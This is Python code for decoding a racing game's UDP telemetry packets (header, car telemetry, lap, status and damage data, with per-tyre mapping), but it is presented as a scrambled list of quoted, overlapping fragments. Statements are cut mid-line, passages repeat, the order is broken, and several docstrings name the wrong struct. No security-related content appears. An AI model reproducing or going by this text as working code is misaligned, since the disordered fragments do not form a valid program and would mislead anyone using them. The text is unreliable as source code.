unpacked[len(asdict(packet_header)) : :]", "from player car.\"\"\" player_car_index = self.m_header.m_player_car_index player_values = ( self.m_header.__dict__ | self.m_carStatusData[player_car_index].__dict__.copy() )", "of telemetry values that should be mapped to attributes. 
attribute_name(str): Attribute name used", "= telemetry_value return telemetry_values_dict @dataclass class PacketHeader: \"\"\"PacketHeader struct.\"\"\" m_packet_format: ctypes.c_uint16 m_game_major_version: ctypes.c_uint8", "ctypes.c_float m_fuelCapacity: ctypes.c_float m_fuelRemainingLaps: ctypes.c_float m_actualTyreCompound: ctypes.c_uint8 m_tyresAgeLaps: ctypes.c_uint8 m_ersStoreEnergy: ctypes.c_float m_ersDeployMode: ctypes.c_uint8", "attributes. Args: unpacked (list): Unpacked struct containing all attributes to construct CarTelemetryData class.", "player_car_index = self.m_header.m_player_car_index player_car_damage = self.m_carDamageData[player_car_index] player_car_damage_message = ( self.m_header.__dict__ | player_car_damage.__dict__.copy() )", "from list to attributes player_telemetry_message = ( player_telemetry_message | _telemetry_list_to_attributes( player_telemetry_message[\"m_tyres_pressure\"], \"m_tyres_pressure\", )", "unpacked[3], unpacked[4], unpacked[8] ) @dataclass class PacketLapData(PacketWOAdditionalAttributes): \"\"\"PacketCarTelemetryData struct.\"\"\" m_lap_data: List[LapData] @classmethod def", "( player_car_damage_message | _telemetry_list_to_attributes( player_car_damage_message[\"m_tyresDamage\"], \"m_tyresDamage\", ) ) player_car_damage_message.pop(\"m_tyresDamage\") # Map brake damage", "binary UDP package. Args: packet_header (PacketHeader): PacketHeader class. 
binary_message (str): Binary representation of", "import List PACKET_HEADER_FORMAT = \"<HBBBBQfLBB\" PACKET_CAR_TELEMETRY_DATA_FORMAT = \"BBb\" CAR_TELEMETRY_DATA_FORMAT = \"HfffBbHBBHHHHHBBBBBBBBHffffBBBB\" LAP_DATA_FORMAT =", "from list to attributes player_telemetry_message = ( player_telemetry_message | _telemetry_list_to_attributes( player_telemetry_message[\"m_tyres_inner_temperature\"], \"m_tyres_inner_temperature\", )", "enumerate(telemetry_values): key_name = str(attribute_name) + \"_\" + car_position_mapping[i] telemetry_values_dict[key_name] = telemetry_value return telemetry_values_dict", "unpacked[6], unpacked[7], unpacked[8], unpacked[9], ) @dataclass class PacketWOAdditionalAttributes: \"\"\"PacketCarStatusData struct.\"\"\" m_header: PacketHeader @classmethod", "package. Args: packet_header (PacketHeader): PacketHeader class. binary_message (str): Binary representation of struct. \"\"\"", "of struct. \"\"\" # Unpack struct unpacked = struct.unpack_from( PACKET_HEADER_FORMAT + \"\".join(message_format *", "unpacked[6], unpacked[7], unpacked[13], unpacked[15], unpacked[17], unpacked[18], unpacked[19], unpacked[20], unpacked[21], ) @dataclass class PacketCarStatusData(PacketWOAdditionalAttributes):", "unpacked[26]]), list([unpacked[27], unpacked[28], unpacked[29], unpacked[30]]), ) @dataclass class PacketCarTelemetryData: \"\"\"PacketCarTelemetryData struct.\"\"\" m_header: PacketHeader", "(PacketHeader): PacketHeader class. binary_message (str): Binary representation of struct. 
\"\"\" lap_data_list = cls.get_message_list(", "list([unpacked[4], unpacked[5], unpacked[6], unpacked[7]]), list([unpacked[8], unpacked[9], unpacked[10], unpacked[11]]), ) @dataclass class PacketCarDamageData(PacketWOAdditionalAttributes): \"\"\"PacketCarStatusData", ") @dataclass class PacketCarDamageData(PacketWOAdditionalAttributes): \"\"\"PacketCarStatusData struct.\"\"\" m_carDamageData: List[CarDamageData] @classmethod def from_binary(cls, packet_header: PacketHeader,", "class. \"\"\" return cls( unpacked[5], unpacked[6], unpacked[7], unpacked[13], unpacked[15], unpacked[17], unpacked[18], unpacked[19], unpacked[20],", "cls.get_message_list( packet_header, binary_message, CAR_DAMAGE_DATA_FORMAT, CarDamageData ) return cls(packet_header, car_damage_data_list) def get_player_car_data(self) -> dict:", "CAR_STATUS_DATA_FORMAT = \"BBBBBfffHHBBHBBBbfBfffB\" CAR_DAMAGE_DATA_FORMAT = \"ffffBBBBBBBBBBBBBBBBBBBBBBB\" def _telemetry_list_to_attributes(telemetry_values: list, attribute_name: str) -> dict:", "ctypes.c_uint8 m_packet_id: ctypes.c_uint8 m_session_uid: ctypes.c_uint64 m_session_time: ctypes.c_float m_frame_identifier: ctypes.c_uint32 m_player_car_index: ctypes.c_uint8 m_secondary_player_car_index: ctypes.c_uint8", ") # Map tyre temperature values from list to attributes player_telemetry_message = (", "dataclass, asdict from typing import List PACKET_HEADER_FORMAT = \"<HBBBBQfLBB\" PACKET_CAR_TELEMETRY_DATA_FORMAT = \"BBb\" CAR_TELEMETRY_DATA_FORMAT", "ctypes.c_uint8 m_suggested_gear: ctypes.c_int8 @classmethod def from_binary(cls, packet_header: PacketHeader, binary_message: str): \"\"\"Create class form", "CarDamageData ) return cls(packet_header, car_damage_data_list) def get_player_car_data(self) -> dict: \"\"\"Get data from player", "unpacked_wo_header[ i * len(message_format) : (i + 1) * len(message_format) ] ) data_list.append(data)", "cls( unpacked[5], unpacked[6], unpacked[7], unpacked[13], unpacked[15], unpacked[17], unpacked[18], unpacked[19], 
unpacked[20], unpacked[21], ) @dataclass", "tyre damage values from list to attributes player_car_damage_message = ( player_car_damage_message | _telemetry_list_to_attributes(", "class CarStatusData: \"\"\"CarStatusData struct.\"\"\" m_fuelInTank: ctypes.c_float m_fuelCapacity: ctypes.c_float m_fuelRemainingLaps: ctypes.c_float m_actualTyreCompound: ctypes.c_uint8 m_tyresAgeLaps:", "m_ersDeployMode: ctypes.c_uint8 m_ersHarvestedThisLapMGUK: ctypes.c_float m_ersHarvestedThisLapMGUH: ctypes.c_float m_ersDeployedThisLap: ctypes.c_float @classmethod def from_unpacked(cls, unpacked: List):", "get_player_car_data(self) -> dict: \"\"\"Get data from player car.\"\"\" player_car_index = self.m_header.m_player_car_index player_car_telemetry =", "Binary representation of struct. \"\"\" car_damage_data_list = cls.get_message_list( packet_header, binary_message, CAR_DAMAGE_DATA_FORMAT, CarDamageData )", "packet_header, binary_message, CAR_DAMAGE_DATA_FORMAT, CarDamageData ) return cls(packet_header, car_damage_data_list) def get_player_car_data(self) -> dict: \"\"\"Get", "ctypes.c_uint32 m_player_car_index: ctypes.c_uint8 m_secondary_player_car_index: ctypes.c_uint8 @classmethod def from_binary(cls, binary_message: str): \"\"\"Create class form", "\"_\" + car_position_mapping[i] telemetry_values_dict[key_name] = telemetry_value return telemetry_values_dict @dataclass class PacketHeader: \"\"\"PacketHeader struct.\"\"\"", "return cls( unpacked[0], unpacked[1], unpacked[2], unpacked[3], unpacked[4], unpacked[5], unpacked[6], unpacked[7], unpacked[8], unpacked[9], )", "player_telemetry_message | _telemetry_list_to_attributes( player_telemetry_message[\"m_tyres_surface_temperature\"], \"m_tyres_surface_temperature\", ) ) player_telemetry_message.pop(\"m_tyres_surface_temperature\") # Map tyre inner temperature", "unpacked[28], unpacked[29], unpacked[30]]), ) @dataclass class PacketCarTelemetryData: \"\"\"PacketCarTelemetryData struct.\"\"\" m_header: PacketHeader 
m_car_telemetry_data: List[CarTelemetryData]", "binary_message (str): Binary representation of struct. \"\"\" car_status_data_list = cls.get_message_list( packet_header, binary_message, CAR_STATUS_DATA_FORMAT,", "= ( player_telemetry_message | _telemetry_list_to_attributes( player_telemetry_message[\"m_tyres_surface_temperature\"], \"m_tyres_surface_temperature\", ) ) player_telemetry_message.pop(\"m_tyres_surface_temperature\") # Map tyre", "= ( self.m_header.__dict__ | self.m_lap_data[player_car_index].__dict__.copy() ) return player_values @dataclass class CarStatusData: \"\"\"CarStatusData struct.\"\"\"", "Map tyre temperature values from list to attributes player_telemetry_message = ( player_telemetry_message |", "m_fuelInTank: ctypes.c_float m_fuelCapacity: ctypes.c_float m_fuelRemainingLaps: ctypes.c_float m_actualTyreCompound: ctypes.c_uint8 m_tyresAgeLaps: ctypes.c_uint8 m_ersStoreEnergy: ctypes.c_float m_ersDeployMode:", "player_car_index = self.m_header.m_player_car_index player_values = ( self.m_header.__dict__ | self.m_lap_data[player_car_index].__dict__.copy() ) return player_values @dataclass", "values from list to attributes player_car_damage_message = ( player_car_damage_message | _telemetry_list_to_attributes( player_car_damage_message[\"m_brakesDamage\"], \"m_brakesDamage\",", "| _telemetry_list_to_attributes( player_car_damage_message[\"m_tyresWear\"], \"m_tyresWear\", ) ) player_car_damage_message.pop(\"m_tyresWear\") # Map tyre damage values from", "unpacked[24], unpacked[25], unpacked[26]]), list([unpacked[27], unpacked[28], unpacked[29], unpacked[30]]), ) @dataclass class PacketCarTelemetryData: \"\"\"PacketCarTelemetryData struct.\"\"\"", "return cls(packet_header, car_damage_data_list) def get_player_car_data(self) -> dict: \"\"\"Get data from player car.\"\"\" player_car_index", "car car_telemetry_data_list = list() for i in range(22): car_telemetry_data = CarTelemetryData.from_unpacked( unpacked_wo_header[ i", "cls.get_message_list( 
packet_header, binary_message, LAP_DATA_FORMAT, LapData ) return cls(packet_header, lap_data_list) def get_player_car_data(self) -> dict:", "get_player_car_data(self) -> dict: \"\"\"Get data from player car.\"\"\" player_car_index = self.m_header.m_player_car_index player_car_damage =", "player_telemetry_message[\"m_tyres_inner_temperature\"], \"m_tyres_inner_temperature\", ) ) player_telemetry_message.pop(\"m_tyres_inner_temperature\") # Map brake temperature values from list to", "unpacked[17]]), list([unpacked[18], unpacked[19], unpacked[20], unpacked[21]]), unpacked[22], list([unpacked[23], unpacked[24], unpacked[25], unpacked[26]]), list([unpacked[27], unpacked[28], unpacked[29],", "return player_values @dataclass class CarStatusData: \"\"\"CarStatusData struct.\"\"\" m_fuelInTank: ctypes.c_float m_fuelCapacity: ctypes.c_float m_fuelRemainingLaps: ctypes.c_float", "CAR_STATUS_DATA_FORMAT, CarStatusData ) return cls(packet_header, car_status_data_list) def get_player_car_data(self) -> dict: \"\"\"Get data from", "= \"BBBBBfffHHBBHBBBbfBfffB\" CAR_DAMAGE_DATA_FORMAT = \"ffffBBBBBBBBBBBBBBBBBBBBBBB\" def _telemetry_list_to_attributes(telemetry_values: list, attribute_name: str) -> dict: \"\"\"Get", "unpacked[3], unpacked[4], unpacked[5], unpacked[6], unpacked[7], unpacked[8], unpacked[9], list([unpacked[10], unpacked[11], unpacked[12], unpacked[13]]), list([unpacked[14], unpacked[15],", "(str): Binary representation of struct. \"\"\" # Unpack struct unpacked = struct.unpack_from( PACKET_HEADER_FORMAT", "and allocate to position on car (fl, fr, rl, rr). 
Args: telemetry_values(list): List", "= CarTelemetryData.from_unpacked( unpacked_wo_header[ i * len(CAR_TELEMETRY_DATA_FORMAT) : (i + 1) * len(CAR_TELEMETRY_DATA_FORMAT) ]", "m_currentLapNum: ctypes.c_uint8 @classmethod def from_unpacked(cls, unpacked: List): \"\"\"Parse unpacked struct into class attributes.", "class CarTelemetryData: \"\"\"CarTelemetryData struct.\"\"\" m_speed: ctypes.c_uint16 m_throttle: ctypes.c_float m_steer: ctypes.c_float m_brake: ctypes.c_float m_clutch:", "self.m_header.__dict__ | player_car_damage.__dict__.copy() ) # Map tyre wear values from list to attributes", "player_telemetry_message @dataclass class LapData: \"\"\"LapData struct.\"\"\" m_lastLapTimeInMS: ctypes.c_uint32 m_currentLapTimeInMS: ctypes.c_uint32 m_sector1TimeInMS: ctypes.c_uint16 m_sector2TimeInMS:", "struct.\"\"\" m_tyresWear: ctypes.c_float m_tyresDamage: ctypes.c_uint8 m_brakesDamage: ctypes.c_uint8 @classmethod def from_unpacked(cls, unpacked: List): \"\"\"Parse", "from attributes list and allocate to position on car (fl, fr, rl, rr).", "\"\"\"CarTelemetryData struct.\"\"\" m_speed: ctypes.c_uint16 m_throttle: ctypes.c_float m_steer: ctypes.c_float m_brake: ctypes.c_float m_clutch: ctypes.c_uint8 m_gear:", "car.\"\"\" player_car_index = self.m_header.m_player_car_index player_values = ( self.m_header.__dict__ | self.m_carStatusData[player_car_index].__dict__.copy() ) return player_values", "binary_message (str): Binary representation of struct. \"\"\" car_damage_data_list = cls.get_message_list( packet_header, binary_message, CAR_DAMAGE_DATA_FORMAT,", "list([unpacked[14], unpacked[15], unpacked[16], unpacked[17]]), list([unpacked[18], unpacked[19], unpacked[20], unpacked[21]]), unpacked[22], list([unpacked[23], unpacked[24], unpacked[25], unpacked[26]]),", "to attributes. attribute_name(str): Attribute name used as keys in dict. 
\"\"\" car_position_mapping =", "m_car_telemetry_data: List[CarTelemetryData] m_mfd_panel_index: ctypes.c_uint8 m_mfd_panel_index_secondary_player: ctypes.c_uint8 m_suggested_gear: ctypes.c_int8 @classmethod def from_binary(cls, packet_header: PacketHeader,", "ctypes.c_uint8 m_brakesDamage: ctypes.c_uint8 @classmethod def from_unpacked(cls, unpacked: List): \"\"\"Parse unpacked struct into class", "player_telemetry_message.pop(\"m_brakes_temperature\") # Map tyres pressure values from list to attributes player_telemetry_message = (", "ctypes.c_uint16 m_drs: ctypes.c_uint8 m_rev_lights_percent: ctypes.c_uint8 m_rev_lights_bit_value: ctypes.c_uint16 m_brakes_temperature: List[ctypes.c_uint16] m_tyres_surface_temperature: List[ctypes.c_uint8] m_tyres_inner_temperature: List[ctypes.c_uint8]", "list to attributes player_telemetry_message = ( player_telemetry_message | _telemetry_list_to_attributes( player_telemetry_message[\"m_tyres_pressure\"], \"m_tyres_pressure\", ) )", "should be mapped to attributes. attribute_name(str): Attribute name used as keys in dict.", "( player_telemetry_message | _telemetry_list_to_attributes( player_telemetry_message[\"m_tyres_inner_temperature\"], \"m_tyres_inner_temperature\", ) ) player_telemetry_message.pop(\"m_tyres_inner_temperature\") # Map brake temperature", "return cls( unpacked[0], unpacked[1], unpacked[2], unpacked[3], unpacked[4], unpacked[8] ) @dataclass class PacketLapData(PacketWOAdditionalAttributes): \"\"\"PacketCarTelemetryData", "for each active car data_list = list() for i in range(22): data =", "ctypes.c_uint16 m_sector2TimeInMS: ctypes.c_uint16 m_lapDistance: ctypes.c_uint32 m_currentLapNum: ctypes.c_uint8 @classmethod def from_unpacked(cls, unpacked: List): \"\"\"Parse", "from_binary(cls, binary_message: str): \"\"\"Create class form binary UDP package. 
Args: binary_message (str): Binary", "\"HfffBbHBBHHHHHBBBBBBBBHffffBBBB\" LAP_DATA_FORMAT = \"LLHHfffBBBBBBBBBBBBBBHHB\" CAR_STATUS_DATA_FORMAT = \"BBBBBfffHHBBHBBBbfBfffB\" CAR_DAMAGE_DATA_FORMAT = \"ffffBBBBBBBBBBBBBBBBBBBBBBB\" def _telemetry_list_to_attributes(telemetry_values: list,", "List[ctypes.c_uint8] m_engine_temperature: ctypes.c_uint16 m_tyres_pressure: List[ctypes.c_float] m_surface_type: List[ctypes.c_uint8] @classmethod def from_unpacked(cls, unpacked: List): \"\"\"Parse", "struct into class attributes. Args: unpacked (list): Unpacked struct containing all attributes to", "(fl, fr, rl, rr). Args: telemetry_values(list): List of telemetry values that should be", "(str): Binary representation of struct. \"\"\" car_damage_data_list = cls.get_message_list( packet_header, binary_message, CAR_DAMAGE_DATA_FORMAT, CarDamageData", "attributes. attribute_name(str): Attribute name used as keys in dict. \"\"\" car_position_mapping = [\"rl\",", "attribute_name(str): Attribute name used as keys in dict. \"\"\" car_position_mapping = [\"rl\", \"rr\",", "from binary format and extract player data.\"\"\" import struct import ctypes from dataclasses", "binary_message (str): Binary representation of struct. 
\"\"\" lap_data_list = cls.get_message_list( packet_header, binary_message, LAP_DATA_FORMAT,", "unpacked[3]]), list([unpacked[4], unpacked[5], unpacked[6], unpacked[7]]), list([unpacked[8], unpacked[9], unpacked[10], unpacked[11]]), ) @dataclass class PacketCarDamageData(PacketWOAdditionalAttributes):", "format_string = \"<HBBBBQfLBB\" unpacked = struct.unpack_from(format_string, binary_message) return cls( unpacked[0], unpacked[1], unpacked[2], unpacked[3],", "player_car_damage_message | _telemetry_list_to_attributes( player_car_damage_message[\"m_tyresWear\"], \"m_tyresWear\", ) ) player_car_damage_message.pop(\"m_tyresWear\") # Map tyre damage values", "ctypes.c_uint16 m_tyres_pressure: List[ctypes.c_float] m_surface_type: List[ctypes.c_uint8] @classmethod def from_unpacked(cls, unpacked: List): \"\"\"Parse unpacked struct", "into class attributes. Args: unpacked (list): Unpacked struct containing all attributes to construct", "get_player_car_data(self) -> dict: \"\"\"Get data from player car.\"\"\" player_car_index = self.m_header.m_player_car_index player_values =", "rl, rr). Args: telemetry_values(list): List of telemetry values that should be mapped to", "= \"HfffBbHBBHHHHHBBBBBBBBHffffBBBB\" LAP_DATA_FORMAT = \"LLHHfffBBBBBBBBBBBBBBHHB\" CAR_STATUS_DATA_FORMAT = \"BBBBBfffHHBBHBBBbfBfffB\" CAR_DAMAGE_DATA_FORMAT = \"ffffBBBBBBBBBBBBBBBBBBBBBBB\" def _telemetry_list_to_attributes(telemetry_values:", "m_actualTyreCompound: ctypes.c_uint8 m_tyresAgeLaps: ctypes.c_uint8 m_ersStoreEnergy: ctypes.c_float m_ersDeployMode: ctypes.c_uint8 m_ersHarvestedThisLapMGUK: ctypes.c_float m_ersHarvestedThisLapMGUH: ctypes.c_float m_ersDeployedThisLap:", "keys in dict. \"\"\" car_position_mapping = [\"rl\", \"rr\", \"fl\", \"fr\"] telemetry_values_dict = {}", "Unpacked struct containing all attributes to construct CarTelemetryData class. 
\"\"\" return cls( unpacked[0],", "car_position_mapping = [\"rl\", \"rr\", \"fl\", \"fr\"] telemetry_values_dict = {} for i, telemetry_value in", "struct. \"\"\" # Unpack struct unpacked = struct.unpack_from( PACKET_HEADER_FORMAT + \"\".join(CAR_TELEMETRY_DATA_FORMAT * 22)", "binary_message: str): \"\"\"Create class form binary UDP package. Args: packet_header (PacketHeader): PacketHeader class.", "# Remove header from struct unpacked_wo_header = unpacked[len(asdict(packet_header)) : :] # Get telemetry", "Map tyre inner temperature values from list to attributes player_telemetry_message = ( player_telemetry_message", "i * len(message_format) : (i + 1) * len(message_format) ] ) data_list.append(data) return", "PacketCarDamageData(PacketWOAdditionalAttributes): \"\"\"PacketCarStatusData struct.\"\"\" m_carDamageData: List[CarDamageData] @classmethod def from_binary(cls, packet_header: PacketHeader, binary_message: str): \"\"\"Create", "# Map tyre damage values from list to attributes player_car_damage_message = ( player_car_damage_message", "\"\"\" # Unpack struct unpacked = struct.unpack_from( PACKET_HEADER_FORMAT + \"\".join(CAR_TELEMETRY_DATA_FORMAT * 22) +", "of struct. 
\"\"\" car_status_data_list = cls.get_message_list( packet_header, binary_message, CAR_STATUS_DATA_FORMAT, CarStatusData ) return cls(packet_header,", "for i, telemetry_value in enumerate(telemetry_values): key_name = str(attribute_name) + \"_\" + car_position_mapping[i] telemetry_values_dict[key_name]", "list to attributes player_telemetry_message = ( player_telemetry_message | _telemetry_list_to_attributes( player_telemetry_message[\"m_tyres_surface_temperature\"], \"m_tyres_surface_temperature\", ) )", "+ car_position_mapping[i] telemetry_values_dict[key_name] = telemetry_value return telemetry_values_dict @dataclass class PacketHeader: \"\"\"PacketHeader struct.\"\"\" m_packet_format:", "for each active car car_telemetry_data_list = list() for i in range(22): car_telemetry_data =", "m_player_car_index: ctypes.c_uint8 m_secondary_player_car_index: ctypes.c_uint8 @classmethod def from_binary(cls, binary_message: str): \"\"\"Create class form binary", "# Map tyre inner temperature values from list to attributes player_telemetry_message = (", "= {} for i, telemetry_value in enumerate(telemetry_values): key_name = str(attribute_name) + \"_\" +", "ctypes.c_int8 m_engine_rpm: ctypes.c_uint16 m_drs: ctypes.c_uint8 m_rev_lights_percent: ctypes.c_uint8 m_rev_lights_bit_value: ctypes.c_uint16 m_brakes_temperature: List[ctypes.c_uint16] m_tyres_surface_temperature: List[ctypes.c_uint8]", "LapData: \"\"\"LapData struct.\"\"\" m_lastLapTimeInMS: ctypes.c_uint32 m_currentLapTimeInMS: ctypes.c_uint32 m_sector1TimeInMS: ctypes.c_uint16 m_sector2TimeInMS: ctypes.c_uint16 m_lapDistance: ctypes.c_uint32", "\"m_tyresWear\", ) ) player_car_damage_message.pop(\"m_tyresWear\") # Map tyre damage values from list to attributes", "\"<HBBBBQfLBB\" unpacked = struct.unpack_from(format_string, binary_message) return cls( unpacked[0], unpacked[1], unpacked[2], unpacked[3], unpacked[4], unpacked[5],", "= ( self.m_header.__dict__ | self.m_carStatusData[player_car_index].__dict__.copy() ) 
return player_values @dataclass class CarDamageData: \"\"\"CarStatusData struct.\"\"\"", "m_lastLapTimeInMS: ctypes.c_uint32 m_currentLapTimeInMS: ctypes.c_uint32 m_sector1TimeInMS: ctypes.c_uint16 m_sector2TimeInMS: ctypes.c_uint16 m_lapDistance: ctypes.c_uint32 m_currentLapNum: ctypes.c_uint8 @classmethod", "def from_unpacked(cls, unpacked: List): \"\"\"Parse unpacked struct into class attributes. Args: unpacked (list):", "unpacked[9], unpacked[10], unpacked[11]]), ) @dataclass class PacketCarDamageData(PacketWOAdditionalAttributes): \"\"\"PacketCarStatusData struct.\"\"\" m_carDamageData: List[CarDamageData] @classmethod def", "m_brakes_temperature: List[ctypes.c_uint16] m_tyres_surface_temperature: List[ctypes.c_uint8] m_tyres_inner_temperature: List[ctypes.c_uint8] m_engine_temperature: ctypes.c_uint16 m_tyres_pressure: List[ctypes.c_float] m_surface_type: List[ctypes.c_uint8] @classmethod", "@dataclass class PacketCarStatusData(PacketWOAdditionalAttributes): \"\"\"PacketCarStatusData struct.\"\"\" m_carStatusData: List[CarStatusData] @classmethod def from_binary(cls, packet_header: PacketHeader, binary_message:", "( player_telemetry_message | _telemetry_list_to_attributes( player_telemetry_message[\"m_tyres_surface_temperature\"], \"m_tyres_surface_temperature\", ) ) player_telemetry_message.pop(\"m_tyres_surface_temperature\") # Map tyre inner", "= ( player_car_damage_message | _telemetry_list_to_attributes( player_car_damage_message[\"m_tyresWear\"], \"m_tyresWear\", ) ) player_car_damage_message.pop(\"m_tyresWear\") # Map tyre", "= cls.get_message_list( packet_header, binary_message, CAR_DAMAGE_DATA_FORMAT, CarDamageData ) return cls(packet_header, car_damage_data_list) def get_player_car_data(self) ->", "player_values = ( self.m_header.__dict__ | self.m_lap_data[player_car_index].__dict__.copy() ) return player_values @dataclass class CarStatusData: \"\"\"CarStatusData", "ctypes.c_uint8 m_game_minor_version: ctypes.c_uint8 m_packet_version: ctypes.c_uint8 
m_packet_id: ctypes.c_uint8 m_session_uid: ctypes.c_uint64 m_session_time: ctypes.c_float m_frame_identifier: ctypes.c_uint32", "name used as keys in dict. \"\"\" car_position_mapping = [\"rl\", \"rr\", \"fl\", \"fr\"]", "unpacked[len(asdict(packet_header)) : :] # Get lap data for each active car data_list =", "dict: \"\"\"Get data from player car.\"\"\" player_car_index = self.m_header.m_player_car_index player_values = ( self.m_header.__dict__", "attributes to construct CarTelemetryData class. \"\"\" return cls( list([unpacked[0], unpacked[1], unpacked[2], unpacked[3]]), list([unpacked[4],", "from struct unpacked_wo_header = unpacked[len(asdict(packet_header)) : :] # Get lap data for each", "CAR_DAMAGE_DATA_FORMAT, CarDamageData ) return cls(packet_header, car_damage_data_list) def get_player_car_data(self) -> dict: \"\"\"Get data from", "+ 1) * len(message_format) ] ) data_list.append(data) return data_list @dataclass class CarTelemetryData: \"\"\"CarTelemetryData", ") def get_player_car_data(self) -> dict: \"\"\"Get data from player car.\"\"\" player_car_index = self.m_header.m_player_car_index", ") ) player_telemetry_message.pop(\"m_tyres_inner_temperature\") # Map brake temperature values from list to attributes player_telemetry_message", "Classes parse data from binary format and extract player data.\"\"\" import struct import", "from_binary(cls, packet_header: PacketHeader, binary_message: str): \"\"\"Create class form binary UDP package. 
Args: packet_header", "player_car_index = self.m_header.m_player_car_index player_values = ( self.m_header.__dict__ | self.m_carStatusData[player_car_index].__dict__.copy() ) return player_values @dataclass", "return cls( list([unpacked[0], unpacked[1], unpacked[2], unpacked[3]]), list([unpacked[4], unpacked[5], unpacked[6], unpacked[7]]), list([unpacked[8], unpacked[9], unpacked[10],", "\"\"\" car_damage_data_list = cls.get_message_list( packet_header, binary_message, CAR_DAMAGE_DATA_FORMAT, CarDamageData ) return cls(packet_header, car_damage_data_list) def", "# Map brake damage values from list to attributes player_car_damage_message = ( player_car_damage_message", "| _telemetry_list_to_attributes( player_telemetry_message[\"m_tyres_pressure\"], \"m_tyres_pressure\", ) ) player_telemetry_message.pop(\"m_tyres_pressure\") player_telemetry_message.pop(\"m_surface_type\") return player_telemetry_message @dataclass class LapData:", "\"\"\"Get single attributes from attributes list and allocate to position on car (fl,", "packet_header (PacketHeader): PacketHeader class. binary_message (str): Binary representation of struct. \"\"\" # Unpack", "len(message_format) ] ) data_list.append(data) return data_list @dataclass class CarTelemetryData: \"\"\"CarTelemetryData struct.\"\"\" m_speed: ctypes.c_uint16", "Binary representation of struct. 
\"\"\" lap_data_list = cls.get_message_list( packet_header, binary_message, LAP_DATA_FORMAT, LapData )", "CAR_DAMAGE_DATA_FORMAT = \"ffffBBBBBBBBBBBBBBBBBBBBBBB\" def _telemetry_list_to_attributes(telemetry_values: list, attribute_name: str) -> dict: \"\"\"Get single attributes", "self.m_header.m_player_car_index player_car_damage = self.m_carDamageData[player_car_index] player_car_damage_message = ( self.m_header.__dict__ | player_car_damage.__dict__.copy() ) # Map", "packet_header, car_telemetry_data_list, unpacked_wo_header[-3], unpacked_wo_header[-2], unpacked_wo_header[-1], ) def get_player_car_data(self) -> dict: \"\"\"Get data from", "def _telemetry_list_to_attributes(telemetry_values: list, attribute_name: str) -> dict: \"\"\"Get single attributes from attributes list", "fr, rl, rr). Args: telemetry_values(list): List of telemetry values that should be mapped", "unpacked[21]]), unpacked[22], list([unpacked[23], unpacked[24], unpacked[25], unpacked[26]]), list([unpacked[27], unpacked[28], unpacked[29], unpacked[30]]), ) @dataclass class", "damage values from list to attributes player_car_damage_message = ( player_car_damage_message | _telemetry_list_to_attributes( player_car_damage_message[\"m_brakesDamage\"],", "return telemetry_values_dict @dataclass class PacketHeader: \"\"\"PacketHeader struct.\"\"\" m_packet_format: ctypes.c_uint16 m_game_major_version: ctypes.c_uint8 m_game_minor_version: ctypes.c_uint8", ":] # Get telemetry for each active car car_telemetry_data_list = list() for i", ") player_telemetry_message.pop(\"m_brakes_temperature\") # Map tyres pressure values from list to attributes player_telemetry_message =", "car_status_data_list = cls.get_message_list( packet_header, binary_message, CAR_STATUS_DATA_FORMAT, CarStatusData ) return cls(packet_header, car_status_data_list) def get_player_car_data(self)", "of struct. 
\"\"\" # Unpack struct unpacked = struct.unpack_from( PACKET_HEADER_FORMAT + \"\".join(CAR_TELEMETRY_DATA_FORMAT *", ") player_telemetry_message.pop(\"m_tyres_inner_temperature\") # Map brake temperature values from list to attributes player_telemetry_message =", "1) * len(message_format) ] ) data_list.append(data) return data_list @dataclass class CarTelemetryData: \"\"\"CarTelemetryData struct.\"\"\"", "class. binary_message (str): Binary representation of struct. \"\"\" lap_data_list = cls.get_message_list( packet_header, binary_message,", "class. binary_message (str): Binary representation of struct. \"\"\" car_damage_data_list = cls.get_message_list( packet_header, binary_message,", "telemetry_values_dict = {} for i, telemetry_value in enumerate(telemetry_values): key_name = str(attribute_name) + \"_\"", "PACKET_HEADER_FORMAT + \"\".join(CAR_TELEMETRY_DATA_FORMAT * 22) + PACKET_CAR_TELEMETRY_DATA_FORMAT, binary_message, ) # Remove header from", "values from list to attributes player_car_damage_message = ( player_car_damage_message | _telemetry_list_to_attributes( player_car_damage_message[\"m_tyresDamage\"], \"m_tyresDamage\",", "ctypes.c_float @classmethod def from_unpacked(cls, unpacked: List): \"\"\"Parse unpacked struct into class attributes. Args:", "to construct CarTelemetryData class. \"\"\" return cls( unpacked[5], unpacked[6], unpacked[7], unpacked[13], unpacked[15], unpacked[17],", "(i + 1) * len(message_format) ] ) data_list.append(data) return data_list @dataclass class CarTelemetryData:", "unpacked_wo_header = unpacked[len(asdict(packet_header)) : :] # Get telemetry for each active car car_telemetry_data_list", "(PacketHeader): PacketHeader class. binary_message (str): Binary representation of struct. 
\"\"\" # Unpack struct", "to attributes player_telemetry_message = ( player_telemetry_message | _telemetry_list_to_attributes( player_telemetry_message[\"m_brakes_temperature\"], \"m_brakes_temperature\", ) ) player_telemetry_message.pop(\"m_brakes_temperature\")", "brake damage values from list to attributes player_car_damage_message = ( player_car_damage_message | _telemetry_list_to_attributes(", "= self.m_header.m_player_car_index player_car_telemetry = self.m_car_telemetry_data[player_car_index] player_telemetry_message = ( self.m_header.__dict__ | player_car_telemetry.__dict__.copy() ) #", "player_telemetry_message | _telemetry_list_to_attributes( player_telemetry_message[\"m_tyres_inner_temperature\"], \"m_tyres_inner_temperature\", ) ) player_telemetry_message.pop(\"m_tyres_inner_temperature\") # Map brake temperature values", "( self.m_header.__dict__ | player_car_telemetry.__dict__.copy() ) # Map tyre temperature values from list to", "Map brake temperature values from list to attributes player_telemetry_message = ( player_telemetry_message |", "unpacked[8] ) @dataclass class PacketLapData(PacketWOAdditionalAttributes): \"\"\"PacketCarTelemetryData struct.\"\"\" m_lap_data: List[LapData] @classmethod def from_binary(cls, packet_header:", "= self.m_header.m_player_car_index player_values = ( self.m_header.__dict__ | self.m_lap_data[player_car_index].__dict__.copy() ) return player_values @dataclass class", "Binary representation of struct. \"\"\" car_status_data_list = cls.get_message_list( packet_header, binary_message, CAR_STATUS_DATA_FORMAT, CarStatusData )", "\"\"\"Create class form binary UDP package. Args: packet_header (PacketHeader): PacketHeader class. 
